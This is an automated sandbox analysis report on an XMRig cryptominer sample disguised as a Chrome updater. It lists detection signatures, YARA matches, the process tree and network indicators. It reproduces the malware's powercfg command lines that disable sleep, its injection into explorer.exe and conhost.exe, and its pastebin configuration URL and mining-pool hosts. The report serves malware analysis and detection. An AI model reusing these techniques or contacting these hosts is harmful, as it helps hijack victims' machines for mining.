Windows Analysis Report
c2.exe

Overview

General Information

Sample name: c2.exe
Analysis ID: 1576710
MD5: eb0588e6420a0a2fb8b262554091add3
SHA1: 5c2bdd9050a44b7afd028e9be44142da93232a37
SHA256: 6cb04057a0313bc34459aba72170f4039148aaace0b396b6c881b92769199853
Tags: dacsanvinhchau-vn, exe, user-JAMESWT_MHT

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Yara signature match

Classification

  • System is w10x64
  • c2.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\c2.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
  • cmd.exe (PID: 7440 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7520 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7560 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7608 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7620 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • updater.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
    • conhost.exe (PID: 7808 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 7868 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 7696 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7772 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7820 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7836 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7852 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • updater.exe (PID: 7928 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: EB0588E6420A0A2FB8B262554091ADD3)
  • cmd.exe (PID: 7940 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7992 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8044 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8072 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8096 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4e4b68:$a1: mining.set_target
  • 0x4e03c8:$a2: XMRIG_HOSTNAME
  • 0x4e1ed0:$a3: Usage: xmrig [OPTIONS]
  • 0x4e03a0:$a4: XMRIG_VERSION
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | Rule: MAL_XMR_Miner_May19_1 | Description: Detects Monero Crypto Coin Miner | Author: Florian Roth
  • 0x4eac21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | Rule: MALWARE_Win_CoinMiner02 | Description: Detects coinmining malware | Author: ditekSHen
  • 0x4eb1e0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4eba40:$s3: \\.\WinRing0_
  • 0x4e4178:$s4: pool_wallet
  • 0x4446e0:$s5: cryptonight
  • 0x4446f0:$s5: cryptonight
  • 0x444700:$s5: cryptonight
  • 0x444710:$s5: cryptonight
  • 0x444728:$s5: cryptonight
  • 0x444738:$s5: cryptonight
  • 0x444748:$s5: cryptonight
  • 0x444760:$s5: cryptonight
  • 0x444770:$s5: cryptonight
  • 0x444788:$s5: cryptonight
  • 0x4447a0:$s5: cryptonight
  • 0x4447b0:$s5: cryptonight
  • 0x4447c0:$s5: cryptonight
  • 0x4447d0:$s5: cryptonight
  • 0x4447e8:$s5: cryptonight
  • 0x444800:$s5: cryptonight
  • 0x444810:$s5: cryptonight
  • 0x444820:$s5: cryptonight
Source | Rule | Description | Author | Strings
Source: 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4f5068:$a1: mining.set_target
  • 0x4f08c8:$a2: XMRIG_HOSTNAME
  • 0x4f23d0:$a3: Usage: xmrig [OPTIONS]
  • 0x4f08a0:$a4: XMRIG_VERSION
Source: Process Memory Space: conhost.exe PID: 7808 | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source | Rule | Description | Author | Strings
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack | Rule: MacOS_Cryptominer_Xmrig_241780a1 | Description: unknown | Author: unknown
  • 0x4f0668:$a1: mining.set_target
  • 0x4ebec8:$a2: XMRIG_HOSTNAME
  • 0x4ed9d0:$a3: Usage: xmrig [OPTIONS]
  • 0x4ebea0:$a4: XMRIG_VERSION
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack | Rule: MAL_XMR_Miner_May19_1 | Description: Detects Monero Crypto Coin Miner | Author: Florian Roth
  • 0x4f6721:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack | Rule: MALWARE_Win_CoinMiner02 | Description: Detects coinmining malware | Author: ditekSHen
  • 0x4f6ce0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4f7540:$s3: \\.\WinRing0_
  • 0x4efc78:$s4: pool_wallet
  • 0x4501e0:$s5: cryptonight
  • 0x4501f0:$s5: cryptonight
  • 0x450200:$s5: cryptonight
  • 0x450210:$s5: cryptonight
  • 0x450228:$s5: cryptonight
  • 0x450238:$s5: cryptonight
  • 0x450248:$s5: cryptonight
  • 0x450260:$s5: cryptonight
  • 0x450270:$s5: cryptonight
  • 0x450288:$s5: cryptonight
  • 0x4502a0:$s5: cryptonight
  • 0x4502b0:$s5: cryptonight
  • 0x4502c0:$s5: cryptonight
  • 0x4502d0:$s5: cryptonight
  • 0x4502e8:$s5: cryptonight
  • 0x450300:$s5: cryptonight
  • 0x450310:$s5: cryptonight
  • 0x450320:$s5: cryptonight
Source: 19.2.conhost.exe.1b6a8680500.0.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
                No Sigma rule has matched
Timestamp: 2024-12-17T12:46:06.900142+0100 | SID: 2054247 | Severity: 1 | Classtype: A Network Trojan was detected | Source IP: 104.20.4.235 | Source Port: 443 | Destination IP: 192.168.2.4 | Destination Port: 49731 | Protocol: TCP

                AV Detection

Source: c2.exe | Avira: detected
Source: C:\Program Files\Google\Chrome\updater.exe | Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2
Source: C:\Program Files\Google\Chrome\updater.exe | ReversingLabs: Detection: 42%
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | ReversingLabs: Detection: 62%
Source: c2.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Temp\lnobvhjdatqu.tmp | Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe | Joe Sandbox ML: detected
Source: c2.exe | Joe Sandbox ML: detected

                Bitcoin Miner

Source: Yara match | File source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7868, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED
Source: unknown | DNS query: name: xmr-asia1.nanopool.org
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: c2.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp

                Networking

Source: Network traffic | Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.4:49731
Source: C:\Windows\explorer.exe | Network Connect: 103.3.62.64 10343
Source: C:\Windows\explorer.exe | Network Connect: 104.20.4.235 443
Source: C:\Windows\explorer.exe | Network Connect: 51.79.145.144 10343
Source: unknown | DNS query: name: pastebin.com
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 103.3.62.64:10343
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 51.79.145.144:10343
Source: Joe Sandbox View | IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View | IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /raw/YLG9StR0 HTTP/1.1 | Accept: */* | Connection: close | Host: pastebin.com | User-Agent: cpp-httplib/0.12.6
Source: global traffic | DNS traffic detected: DNS query: xmr-asia1.nanopool.org
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR0
Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR0$
Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR0--cinit-stealth-targets=Taskmgr.exe
Source: explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR08
Source: explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR090
Source: explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/YLG9StR0Taskmgr.exe
Source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443

                System Summary

Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\conhost.exe | Code function: 19_2_00007FF778012F50 NtReadFile,19_2_00007FF778012F50
Source: C:\Program Files\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\ppefirylicdf.sys
Source: C:\Program Files\Google\Chrome\updater.exe | File deleted: C:\Windows\Temp\wjwbvsfqhrdh.xml
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\lnobvhjdatqu.tmp 3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\ppefirylicdf.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Windows\System32\conhost.exe | Code function: String function: 00007FF778012F50 appears 31 times
Source: updater.exe.0.dr | Static PE information: Number of sections : 11 > 10
Source: c2.exe | Static PE information: Number of sections : 11 > 10
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.conhost.exe.1b6a8674a00.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.conhost.exe.1b6a8680500.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.conhost.exe.1b6a867cc20.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.conhost.exe.1b6a8680500.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 7808, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\lnobvhjdatqu.tmp, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@45/5@2/3
Source: C:\Users\user\Desktop\c2.exe | File created: C:\Program Files\Google\Chrome\updater.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Users\user\Desktop\c2.exe | File created: C:\Users\user\AppData\Local\Temp\wjwbvsfqhrdh.xml
